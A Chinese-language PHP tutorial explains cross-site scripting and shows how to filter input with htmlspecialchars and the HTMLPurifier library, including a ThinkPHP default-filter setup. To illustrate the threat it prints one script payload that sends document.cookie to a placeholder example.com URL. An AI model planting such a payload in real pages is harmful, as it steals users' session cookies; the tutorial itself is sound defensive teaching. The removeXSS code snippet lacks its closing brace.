PHP预防跨站脚本（XSS）攻击且不影响html代码显示效果

什么是XSS

跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。

XSS（跨站脚本攻击）两种形式：输入JS代码或者HTML代码导致页面乱。

几乎所有的网站都有可能会遭遇XSS攻击，它和sql漏洞注入一样，也是web应用经常会考虑到的安全问题之一。XSS被应用在有通过表单提交数据的地方例如评论，注册，信息录入等。如果攻击者输入了不合法内容（比如一段js代码），而且我们队输入没有过滤和转义，跨站脚本漏洞就产生了。

如果攻击者在评论区插入了以下代码：

<script>
  document.location =
    'http://www.example.com/xxxx.php?cookies=' +
    document.cookie
</script>

而你没有过滤掉或转义的话，那么你的用户将会把他们的coockie发送的攻击者指定的脚本中。这是极其危险的。

如何避免XSS攻击

其实XSS跨站脚本攻击是很容易避免的。

• 最常见的方法是使用htmlspecialchar() 方法过滤信息。
  
  但是使用htmlspecialchar()过滤后会使有些需要显示的Html效果被屏蔽掉比如：
  
  

那么我们可以使用一个开源的XSS过滤包htmlpurifier来过滤并且保留我们要展示的html内容

首先我们下载htmlpurifier包并将其放入项目中，一般我们只需要如下一行代码引入就可以调用其方法。

require_once '/path/to/HTMLPurifier.auto.php';

$config = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);
$html = $purifier->purify($html);

在THINKPHP中使用htmlpurifier

• 而在thinkphp中，我们通过配置将I方法的默认方法由htmlspecialchar改为使用htmlpurifier。这样使用更加方便。
  
  首先下载包并将其放入tp的vendor文件夹下。在function.php中定义函数

function removeXSS($data){
	static $purifier;
	if($purifier === NULL){
		vendor('htmlpurifier.library.HTMLPurifier#auto');//引入
		$config = HTMLPurifier_Config::createDefault();
		$purifier = new HTMLPurifier($config);
	}
	return $purifier->purify($data);

Conf文件夹下的config.php中定义了I函数默认的参数过滤方法。

我们将其修改为我们自定义的函数，这样就可以在使用I方法的时候实现自定义的动态过滤

代码如下

    'DEFAULT_FILTER' => 'trim,removeXSS',